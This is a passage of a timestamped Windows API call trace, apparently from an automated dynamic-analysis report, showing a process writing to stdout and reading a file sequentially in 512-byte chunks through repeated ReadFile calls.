0x50 [0129.878] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.878] GetFileType (hFile=0x50) returned 0x1 [0129.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.878] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.878] GetFileType (hFile=0x50) returned 0x1 [0129.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.879] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.879] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.879] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.879] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.879] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.879] GetFileType (hFile=0x50) returned 0x1 [0129.879] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.020] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, 
lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.020] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.020] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.020] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.020] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.020] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.021] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.021] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.021] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.021] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: 
lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.021] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.021] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.021] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.021] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.021] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.021] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.022] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.022] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.022] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, 
lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.022] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.022] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.022] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.022] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.022] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.022] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.022] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.022] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.023] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.023] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.023] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.023] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.023] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.023] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.023] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.023] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.023] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.023] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.023] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.024] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.024] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.024] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.024] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.024] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.024] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.024] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.024] ReadFile (in: hFile=0x58, 
lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.024] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.024] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.025] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.025] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.025] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.025] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.025] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.025] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.025] ReadFile 
(in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.025] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.025] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.025] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.025] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.026] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.026] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.026] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.026] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 
[0130.026] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.026] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.026] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.026] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.026] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.026] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.026] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.027] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.027] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, 
lpOverlapped=0x0) returned 1 [0130.027] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.027] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.027] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.027] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.027] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.027] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.027] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.027] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.028] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, 
lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.028] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.028] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.028] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.028] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.028] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.028] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.028] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.028] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.028] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: 
lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.028] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.029] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0130.029] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, 